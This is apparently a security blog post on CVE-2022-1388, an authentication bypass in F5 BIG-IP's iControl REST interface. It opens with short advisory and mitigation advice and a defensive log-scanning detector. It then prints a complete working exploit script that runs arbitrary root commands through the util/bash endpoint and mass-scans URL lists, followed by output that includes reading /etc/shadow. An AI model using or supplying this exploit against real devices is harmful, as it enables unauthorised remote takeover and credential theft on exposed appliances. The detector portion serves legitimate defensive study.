
F5 | CVE-2022-1388

A proof of concept (PoC) was developed for a critical vulnerability in F5's BIG-IP networking software that could expose thousands of users to remote control.

The vulnerability, tracked as CVE-2022-1388, could allow an attacker to make undisclosed requests to bypass iControl's REST authentication.


If exploited, an unauthenticated user could get remote code execution (RCE) on an affected device. 👽


Affected Devices

Everything older than version 17 is affected. Patches are available for BIG-IP versions 13 through 16. BIG-IP versions 11 and 12 are vulnerable and have no patch available.


So what should you do?

Usually I recommend patching first and attending to configuration issues later, but in this case I will swap the order: first, make sure you are not exposing the admin interface. If you can't manage that, don't try patching; turn off the device instead. If the configuration interface is safe: patch!
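For the detection side of that advice, here is an added example (mine, not part of the original post or of F5's tooling) that flags requests matching the bypass shape the script on this page sends: a Connection header that names X-F5-Auth-Token so the token header is dropped as hop-by-hop before iControl REST authenticates the request, a Basic Authorization for a local account with an empty password, and a POST to the util/bash endpoint. The input format is an assumption: one JSON object per line with "method", "path" and "headers" keys, as a reverse proxy or SIEM export might produce; the sample records are constructed, not captured traffic.

```python
"""Flag HTTP request records that match the CVE-2022-1388 auth-bypass shape.

Added example, not the page's PoC. Reads one JSON object per line (assumed
format: {"method", "path", "headers"}) and reports requests carrying the
indicators the PoC on this page combines.
"""
import base64
import binascii
import json
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

BASH_ENDPOINT = "/mgmt/tm/util/bash"   # command-execution endpoint the PoC posts to
STRIPPED_HEADER = "x-f5-auth-token"    # header the PoC lists in Connection to get it dropped


@dataclass
class Finding:
    line_no: int
    severity: str
    reasons: List[str]


def parse_basic_auth(value: str) -> Optional[Tuple[str, str]]:
    """Return (user, password) from an 'Authorization: Basic ...' value, else None."""
    scheme, _, b64 = value.strip().partition(" ")
    if scheme.lower() != "basic" or not b64:
        return None
    try:
        decoded = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None


def classify_request(method: str, path: str, headers: Dict[str, str]) -> List[str]:
    """Collect the CVE-2022-1388 indicators present in one request (header names are case-insensitive)."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    reasons: List[str] = []
    conn_tokens = {t.strip().lower() for t in hdrs.get("connection", "").split(",")}
    if STRIPPED_HEADER in conn_tokens:
        reasons.append("Connection header lists X-F5-Auth-Token as hop-by-hop")
    creds = parse_basic_auth(hdrs.get("authorization", ""))
    if creds is not None and creds[1] == "":
        reasons.append(f"Basic auth for '{creds[0]}' with an empty password")
    if method.upper() == "POST" and path.split("?", 1)[0] == BASH_ENDPOINT:
        reasons.append("POST to the util/bash command-execution endpoint")
    return reasons


def severity_for(reasons: List[str]) -> Optional[str]:
    """Escalate as independent indicators co-occur in the same request."""
    if not reasons:
        return None
    if len(reasons) >= 2 and any("util/bash" in r for r in reasons):
        return "critical"
    return "high" if len(reasons) >= 2 else "medium"


def scan_log_lines(lines: List[str]) -> List[Finding]:
    """Evaluate JSON request records one per line; lines that do not parse are skipped."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        reasons = classify_request(rec.get("method", ""), rec.get("path", ""), rec.get("headers", {}))
        sev = severity_for(reasons)
        if sev:
            findings.append(Finding(n, sev, reasons))
    return findings


# Constructed sample records (not captured traffic). Records 1 and 3 are
# ordinary API use, record 2 mirrors the PoC's request shape, and record 4 is
# a token-authenticated call to util/bash that still deserves review.
SAMPLE_LOG = [
    json.dumps({"method": "GET", "path": "/mgmt/tm/ltm/pool",
                "headers": {"Connection": "close", "X-F5-Auth-Token": "<token>"}}),
    json.dumps({"method": "POST", "path": "/mgmt/tm/util/bash",
                "headers": {"Connection": "close, X-F5-Auth-Token, X-Forwarded-For",
                            "X-F5-Auth-Token": "anything",
                            "Authorization": "Basic YWRtaW46"}}),
    json.dumps({"method": "POST", "path": "/mgmt/shared/authn/login",
                "headers": {"Connection": "keep-alive", "Content-Type": "application/json"}}),
    json.dumps({"method": "POST", "path": "/mgmt/tm/util/bash",
                "headers": {"Connection": "close", "X-F5-Auth-Token": "<token>"}}),
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.severity.upper()} - " + "; ".join(f.reasons))
```

The severity ladder is deliberate: any single indicator is worth a look (legitimate administrators do use util/bash), but the stripped-token header together with an empty-password Basic credential has no benign explanation, and adding the bash endpoint on top of that is the exact request the PoC sends.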


▓ CVE-2022-1388.py:

import os
import sys
import argparse
import urllib3
import requests
urllib3.disable_warnings()


headers = {
        "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
        "Content-type": "application/json",
        "Connection": "close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host",
        "X-F5-Auth-Token": "anything",
        "Authorization": "Basic YWRtaW46"}

endpoint = "/mgmt/tm/util/bash"

def usage():
    print("Eg: \n    python3 CVE-2022-1388.py -u https://127.0.0.1")
    print("    python3 CVE-2022-1388.py -u https://127.0.0.1 -c 'cat /etc/passwd'")
    print("    python3 CVE-2022-1388.py -f urls.txt")
    
def poc(url):
    payload = {"command": "run", "utilCmdArgs": "-c id"}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text):
            print("[+] {} is vulnerable!!!".format(url))
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        # format the exception instead of concatenating str + Exception, which raises TypeError
        print("[-] {} Exception: {}".format(url, e))
        return False
    
def exp(url, command):
    payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text):
            print(res.json()['commandResult'])
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        # same fix as in poc(): str + Exception is not valid Python
        print("[-] {} Exception: {}".format(url, e))
        return False

if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE")
    parser.add_argument('-u', '--url', type=str,
                        help="vulnerability verification for individual websites")
    parser.add_argument('-c', '--command', type=str,
                        help="command execution")
    parser.add_argument('-f', '--file', type=str,
                        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()
    # dispatch on the parsed arguments rather than on sys.argv length, so that
    # long options and '--url=...' forms also work
    if args.url and args.command:
        exp(args.url, args.command)
    elif args.url:
        poc(args.url)
    elif args.file:
        if os.path.isfile(args.file):
            with open(args.file) as target:
                urls = target.read().splitlines()
                for url in urls:
                    if poc(url):
                        with open("success.txt", "a+") as f:
                            f.write(url + "\n")
        else:
            print("[-] file not found: {}".format(args.file))
    else:
        parser.print_help()
        usage()

▓ Outputs:


root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address>
[+] https://<ip-address> is vulnerable!!!

root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'id'
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'cat /etc/shadow'
...
root:$6$TMuNP0xxxxxxxx
admin:$6$83fzG1vk$7wpUV.vkxxxxxx
...

⇔ sha512: produces a 512-bit digest. A hashed password that starts with $6$ in /etc/shadow is a SHA-512 crypt hash.


root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'tmsh show sys hardware'

Sys::Hardware
Chassis Information
  Maximum MAC Count  1
  Registration Key   -

Hardware Version Information
  Name        cpus
  Type        base-board
  Model       Intel Xeon Processor (Skylake, IBRS)
  Parameters  --            --
              cache size    4096 KB
              cores         24  (physical:24)
              cpu MHz       2194.838
              cpu sockets   24
              cpu stepping  4


Platform
  Name  BIG-IP Virtual Edition
  BIOS Revision
  Base MAC       52:54:00:xx:55:ba
  Hypervisor     KVM
  Cloud

System Information
  Type                       Z100
  Chassis Serial             191931f7-0dcb-4d7c-45xe
  Level 200/400 Part
  Switchboard Serial
  Switchboard Part Revision
  Host Board Serial
  Host Board Part Revision
